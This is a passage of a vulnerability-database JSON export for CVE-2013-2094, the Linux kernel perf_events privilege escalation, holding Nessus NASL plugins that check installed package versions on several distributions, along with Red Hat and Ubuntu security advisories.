audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-devel / kernel-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:28", "description": "A flaw was found in the way index into perf_swevent_enabled array was\nsanitized. A local, unprivileged user could leverage this flaw to gain\nelevated privileges on the system.", "edition": 23, "published": "2014-03-20T00:00:00", "title": "Amazon Linux AMI : kernel Privilege Escalation (ALAS-2013-190)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2013-190.NASL", "href": "https://www.tenable.com/plugins/nessus/73126", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-190.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73126);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_bugtraq_id(59846);\n script_xref(name:\"ALAS\", value:\"2013-190\");\n script_xref(name:\"CERT\", value:\"774103\");\n script_xref(name:\"EDB-ID\", value:\"25444\");\n script_xref(name:\"EDB-ID\", value:\"26131\");\n\n script_name(english:\"Amazon Linux AMI : kernel Privilege Escalation (ALAS-2013-190)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in the way index into perf_swevent_enabled array was\nsanitized. A local, unprivileged user could leverage this flaw to gain\nelevated privileges on the system.\"\n );\n # http://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2013-190/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa2ce384\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Run 'yum update kernel' to update the system. A reboot will be\nnecessary for the new kernel to be loaded.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/20\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n# kernel-docs skipped, rpm_check ignores it\nif (rpm_check(release:\"ALA\", reference:\"kernel-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-3.4.43-0.0.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0)\n {\n # Disassemble and reassemble rpm_report_get(), the fix version is releases higher than the affected versions\n curr_report = rpm_report_get();\n lines = split(curr_report, sep:'\\n', keep:0);\n new_report = \"\";\n foreach currline (lines)\n {\n new_report += str_replace(\n find:\"-3.4.43-0.0.amzn1\",\n replace:\"-3.4.43-43.43.amzn1\",\n string:currline) + '\\n';\n }\n\n security_hole(port:0, extra:new_report);\n }\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:47:36", "description": "This update fixes the following security issue :\n\n - It was found that the Scientific Linux 6.1 kernel update\n (SLSA-2011:0542) introduced an integer conversion issue\n in the Linux kernel's Performance Events implementation.\n This led to a user-supplied index into the\n perf_swevent_enabled array not being validated properly,\n resulting in out-of-bounds kernel memory access. A\n local, unprivileged user could use this flaw to escalate\n their privileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Scientific Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743 for further information and\nmitigation instructions for users who are unable to immediately apply\nthis update.\n\nThe system must be rebooted for this update to take effect.", "edition": 16, "published": "2013-05-17T00:00:00", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20130516)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-17T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686", "p-cpe:/a:fermilab:scientific_linux:kernel-firmware", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf"], "id": "SL_20130516_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/66490", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66490);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20130516)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue :\n\n - It was found that the Scientific Linux 6.1 kernel update\n (SLSA-2011:0542) introduced an integer conversion issue\n in the Linux kernel's Performance Events implementation.\n This led to a user-supplied index into the\n perf_swevent_enabled array not being validated properly,\n resulting in out-of-bounds kernel memory access. A\n local, unprivileged user could use this flaw to escalate\n their privileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Scientific Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743 for further information and\nmitigation instructions for users who are unable to immediately apply\nthis update.\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1305&L=scientific-linux-errata&T=0&P=1321\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6935123e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:39", "description": "A flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-05-31T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-1849-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1849-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66716", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1849-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66716);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_bugtraq_id(59846);\n script_xref(name:\"USN\", value:\"1849-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-1849-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1849-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.8-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1849-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.8.0-23-generic\", pkgver:\"3.8.0-23.34~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.8-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The system must be rebooted for this update to\ntake effect.\n", "modified": "2015-04-24T14:20:26", "published": "2013-05-17T04:00:00", "id": "RHSA-2013:0832", "href": "https://access.redhat.com/errata/RHSA-2013:0832", "type": "redhat", "title": "(RHSA-2013:0832) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The system must be rebooted for this update to\ntake effect.\n", "modified": "2018-06-06T20:24:05", "published": "2013-05-16T04:00:00", "id": "RHSA-2013:0830", "href": "https://access.redhat.com/errata/RHSA-2013:0830", "type": "redhat", "title": "(RHSA-2013:0830) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The system must be rebooted for this update to\ntake effect.\n", "modified": "2015-04-24T14:17:48", "published": "2013-05-20T04:00:00", "id": "RHSA-2013:0841", "href": "https://access.redhat.com/errata/RHSA-2013:0841", "type": "redhat", "title": "(RHSA-2013:0841) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The system must be rebooted for this update to\ntake effect.\n", "modified": "2015-04-24T14:17:58", "published": "2013-05-20T04:00:00", "id": "RHSA-2013:0840", "href": "https://access.redhat.com/errata/RHSA-2013:0840", "type": "redhat", "title": "(RHSA-2013:0840) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-2094"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1849-1\r\nMay 31, 2013\r\n\r\nlinux-lts-raring vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nThe system could be made to crash or run programs as an administrator if\r\nit received specially crafted network traffic.\r\n\r\nSoftware Description:\r\n- linux-lts-raring: Linux hardware enablement kernel from Raring\r\n\r\nDetails:\r\n\r\nKees Cook discovered a flaw in the Linux kernel's iSCSI subsystem. A remote\r\nunauthenticated attacker could exploit this flaw to cause a denial of\r\nservice (system crash) or potentially gain administrative privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.04 LTS:\r\n 